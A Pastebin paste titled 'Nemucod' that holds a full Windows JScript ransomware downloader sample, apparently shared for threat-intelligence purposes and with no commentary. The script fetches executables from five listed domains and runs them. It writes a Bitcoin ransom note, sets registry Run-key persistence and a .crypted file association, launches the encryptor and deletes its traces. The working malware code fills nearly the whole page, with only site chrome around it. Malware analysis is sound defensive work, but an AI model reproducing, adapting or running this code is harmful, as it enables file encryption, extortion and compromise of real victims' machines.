API tools faq
paste
Advertisement
James_inthe_box

Nemucod

James_inthe_box
May 20th, 2019
561
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.72 KB | None | 0 0
raw download clone embed print report
  1. var id = 'LXD8ChCoeaXvY0jiabUiGD45YojpwUx-mun3rI1oJa-5Ynt8IbxuB7dQ42NDbOSrK4RRYlBr7fA-';
  2. var ad = '15nUMTVJLKYo27GgWbovLHA8DidAx6jvqm';
  3. var bc = '0.47531';
  4. var ld = 0;
  5. var cq = String.fromCharCode(34);
  6. var cs = String.fromCharCode(92);
  7. var ll = [
  8. 'dicsom.com',
  9. 'pticemir.ru',
  10. 'www.trucklogist.ru',
  11. 'collegembip.com',
  12. 'retailrzn.ru'
  13. ];
  14. var ws = WScript.CreateObject('WScript.Shell');
  15. var fn = ws.ExpandEnvironmentStrings('%TEMP%') + cs + 'a';
  16. var pd = ws.ExpandEnvironmentStrings('%TEMP%') + cs + 'php4ts.dll';
  17. var xo = WScript.CreateObject('Msxml2.XMLHTTP');
  18. var xa = WScript.CreateObject('ADODB.Stream');
  19. var fo = WScript.CreateObject('Scripting.FileSystemObject');
  20. if (!fo.FileExists(fn + '.txt')) {
  21. for (var n = 1; n <= 5; n++) {
  22. for (var i = ld; i < ll.length; i++) {
  23. var dn = 0;
  24. try {
  25. xo.open('GET', 'http://' + ll[i] + '/counter/?ad=' + ad + '&id=' + id + '&rnd=' + i + n, false);
  26. xo.send();
  27. if (xo.status == 200) {
  28. xa.open();
  29. xa.type = 1;
  30. xa.write(xo.responseBody);
  31. if (xa.size > 1000) {
  32. dn = 1;
  33. if (n <= 2) {
  34. xa.saveToFile(fn + n + '.exe', 2);
  35. try {
  36. ws.Run(fn + n + '.exe', 1, 0);
  37. } catch (er) {
  38. util_log('>>> Silencing catch ' + _inspect(er));
  39. }
  40. ;
  41. } else if (n == 3) {
  42. xa.saveToFile(fn + '.exe', 2);
  43. } else if (n == 4) {
  44. xa.saveToFile(pd, 2);
  45. } else if (n == 5) {
  46. xa.saveToFile(fn + '.php', 2);
  47. }
  48. }
  49. ;
  50. xa.close();
  51. }
  52. ;
  53. if (dn == 1) {
  54. ld = i;
  55. break;
  56. }
  57. ;
  58. } catch (er) {
  59. util_log('>>> Silencing catch ' + _inspect(er));
  60. }
  61. ;
  62. }
  63. ;
  64. }
  65. ;
  66. if (fo.FileExists(fn + '.exe') && fo.FileExists(pd) && fo.FileExists(fn + '.php')) {
  67. var fp = fo.CreateTextFile(fn + '.txt', true);
  68. fp.WriteLine('ATTENTION!');
  69. fp.WriteLine('');
  70. fp.WriteLine('All your documents, photos, databases and other important personal files');
  71. fp.WriteLine('were encrypted using strong RSA-1024 algorithm with a unique key.');
  72. fp.WriteLine('To restore your files you have to pay ' + bc + ' BTC (bitcoins).');
  73. fp.WriteLine('Please follow this manual:');
  74. fp.WriteLine('');
  75. fp.WriteLine('1. Create Bitcoin wallet here:');
  76. fp.WriteLine('');
  77. fp.WriteLine(' https://blockchain.info/wallet/new');
  78. fp.WriteLine('');
  79. fp.WriteLine('2. Buy ' + bc + ' BTC with cash, using search here:');
  80. fp.WriteLine('');
  81. fp.WriteLine(' https://localbitcoins.com/buy_bitcoins');
  82. fp.WriteLine('');
  83. fp.WriteLine('3. Send ' + bc + ' BTC to this Bitcoin address:');
  84. fp.WriteLine('');
  85. fp.WriteLine(' ' + ad);
  86. fp.WriteLine('');
  87. fp.WriteLine('4. Open one of the following links in your browser to download decryptor:');
  88. fp.WriteLine('');
  89. for (var i = 0; i < ll.length; i++) {
  90. fp.WriteLine(' http://' + ll[i] + '/counter/?a=' + ad);
  91. }
  92. ;
  93. fp.WriteLine('');
  94. fp.WriteLine('5. Run decryptor to restore your files.');
  95. fp.WriteLine('');
  96. fp.WriteLine('PLEASE REMEMBER:');
  97. fp.WriteLine('');
  98. fp.WriteLine(' - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.');
  99. fp.WriteLine(' - Nobody can help you except us.');
  100. fp.WriteLine(' - It`s useless to reinstall Windows, update antivirus software, etc.');
  101. fp.WriteLine(' - Your files can be decrypted only after you make payment.');
  102. fp.WriteLine(' - You can find this manual on your desktop (DECRYPT.txt).');
  103. fp.Close();
  104. ws.Run('%COMSPEC% /c REG ADD ' + cq + 'HKCU' + cs + 'SOFTWARE' + cs + 'Microsoft' + cs + 'Windows' + cs + 'CurrentVersion' + cs + 'Run' + cq + ' /V ' + cq + 'Crypted' + cq + ' /t REG_SZ /F /D ' + cq + fn + '.txt' + cq, 0, 0);
  105. ws.Run('%COMSPEC% /c REG ADD ' + cq + 'HKCR' + cs + '.crypted' + cq + ' /ve /t REG_SZ /F /D ' + cq + 'Crypted' + cq, 0, 0);
  106. ws.Run('%COMSPEC% /c REG ADD ' + cq + 'HKCR' + cs + 'Crypted' + cs + 'shell' + cs + 'open' + cs + 'command' + cq + ' /ve /t REG_SZ /F /D ' + cq + 'notepad.exe ' + cs + cq + fn + '.txt' + cs + cq + cq, 0, 0);
  107. ws.Run('%COMSPEC% /c copy /y ' + cq + fn + '.txt' + cq + ' ' + cq + '%AppData%' + cs + 'Desktop' + cs + 'DECRYPT.txt' + cq, 0, 0);
  108. ws.Run('%COMSPEC% /c copy /y ' + cq + fn + '.txt' + cq + ' ' + cq + '%UserProfile%' + cs + 'Desktop' + cs + 'DECRYPT.txt' + cq, 0, 0);
  109. ws.Run('%COMSPEC% /c ' + fn + '.exe ' + cq + fn + '.php' + cq, 0, 1);
  110. ws.Run('%COMSPEC% /c notepad.exe ' + cq + fn + '.txt' + cq, 0, 0);
  111. var fp = fo.CreateTextFile(fn + '.php', true);
  112. for (var i = 0; i < 1000; i++) {
  113. fp.WriteLine(ad);
  114. }
  115. ;
  116. fp.Close();
  117. ws.Run('%COMSPEC% /c DEL ' + cq + fn + '.php' + cq, 0, 0);
  118. ws.Run('%COMSPEC% /c DEL ' + cq + fn + '.exe' + cq, 0, 0);
  119. ws.Run('%COMSPEC% /c DEL ' + cq + pd + cq, 0, 0);
  120. }
  121. ;
  122. }
  123. ;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!